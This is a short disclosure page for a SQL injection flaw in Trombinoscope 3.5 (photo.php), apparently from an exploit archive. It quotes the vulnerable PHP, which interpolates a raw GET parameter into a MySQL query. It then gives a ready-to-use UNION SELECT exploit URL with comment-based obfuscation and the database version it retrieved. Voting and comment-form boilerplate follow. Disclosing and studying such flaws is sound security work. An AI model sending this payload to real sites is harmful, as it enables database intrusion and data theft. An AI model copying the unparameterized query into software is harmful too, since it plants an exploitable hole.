Trombinoscope 3.5 SQL Injection

2012.05.06

Credit: Ramdan Yantu

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~>
 Exploit Title: Trombinoscope <= 3.5 SQL Injection Vulnerability
 Date: 03 Mei 2012
 Author: Ramdan Yantu
 Home: http://ramdanyantu.com/
 Software Link:
 http://ftp1.toocharger.com/sc2MP3p/trombinoscope_4116.zip
<~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~><~>

 Bugs <photo.php>:

[...]
25 <?php
26 $id = $_GET["id"];
27
28 $query_seul = "SELECT `pseudo`, `sexe`, `img` FROM `trombino` WHERE idx = $id";
29 $seul = mysql_query($query_seul) or die(mysql_error());
30 $row_seul = mysql_fetch_assoc($seul);
31
32 ?>
[...]

 Exploit: http://localhost/[script]/photo.php?id=-9999/**/union/**/select/**/1,2,version()--
 Result : 5.0.51b-community-nt-log

References:

http://ramdanyantu.com/

http://ftp1.toocharger.com/sc2MP3p/trombinoscope_4116.zip

See this note in RAW Version

Vote for this issue:

50%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

Trombinoscope 3.5 SQL Injection

References:

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Trombinoscope 3.5 SQL Injection

References:

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.